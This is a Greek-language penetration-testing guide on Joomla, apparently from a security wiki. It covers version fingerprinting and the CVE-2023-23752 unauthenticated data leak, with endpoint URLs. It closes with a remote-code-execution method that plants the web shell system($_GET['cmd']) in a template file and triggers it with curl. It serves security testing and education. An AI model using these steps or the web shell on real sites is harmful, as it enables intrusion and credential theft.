Joomla
Στατιστικά Joomla
Το Joomla συλλέγει μερικά ανώνυμα στατιστικά χρήσης όπως η ανάλυση των εκδόσεων Joomla, PHP και βάσεων δεδομένων και των λειτουργικών συστημάτων διακομιστών που χρησιμοποιούνται σε εγκαταστάσεις Joomla. Αυτά τα δεδομένα μπορούν να αναζητηθούν μέσω του δημόσιου API τους.
Απαρίθμηση
Ανακάλυψη/Αποτύπωση
Ελέγξτε τα μετα
robots.txt
README.txt
Έκδοση
Στο /administrator/manifests/files/joomla.xml μπορείτε να δείτε την έκδοση.
Στο /language/en-GB/en-GB.xml μπορείτε να βρείτε την έκδοση του Joomla.
Στο plugins/system/cache/cache.xml μπορείτε να δείτε μια περίπου έκδοση.
API Αποκάλυψη Πληροφοριών χωρίς Πιστοποίηση:
Οι εκδόσεις από 4.0.0 έως 4.2.7 είναι ευάλωτες στην Αποκάλυψη πληροφοριών χωρίς πιστοποίηση (CVE-2023-23752) που θα απορροφήσει διαπιστευτήρια και άλλες πληροφορίες.
Χρήστες:
http://<host>/api/v1/users?public=true
Αρχείο ρυθμίσεων:
http://<host>/api/index.php/v1/config/application?public=true
Ενότητα MSF: scanner/http/joomla_api_improper_access_checks
ή ruby script: 51334
Επίθεση Με Δοκιμή Κωδικών
Μπορείτε να χρησιμοποιήσετε αυτό το σενάριο για να προσπαθήσετε να εκτελέσετε επίθεση με δοκιμή κωδικϋ.
RCE
Αν καταφέρετε να αποκτήσετε διαπιστευτήρια διαχειριστή, μπορείτε να εκτελέσετε κώδικα RCE προσθέτοντας ένα τμήμα PHP κώδικα για να κερδίσετε RCE. Μπορούμε να το κάνουμε αυτό προσαρμόζοντας ένα πρότυπο.
Κάντε κλικ στα
Πρότυπα
στο κάτω μέρος κάτω απόΔιαμόρφωση
για να εμφανιστεί το μενού προτύπων.Κάντε κλικ σε ένα όνομα προτύπου. Ας επιλέξουμε
protostar
κάτω από την κεφαλίδα στήληΠρότυπο
. Αυτό θα μας οδηγήσει στη σελίδαΠρότυπα: Προσαρμογή
.Τέλος, μπορείτε να κάνετε κλικ σε μια σελίδα για να εμφανιστεί ο πηγαίος κώδικας. Ας επιλέξουμε τη σελίδα
error.php
. Θα προσθέσουμε ένα PHP μονογραμμικό για εκτέλεση κώδικα ως εξής:system($_GET['cmd']);
Αποθηκεύστε & Κλείστε
curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id
Last updated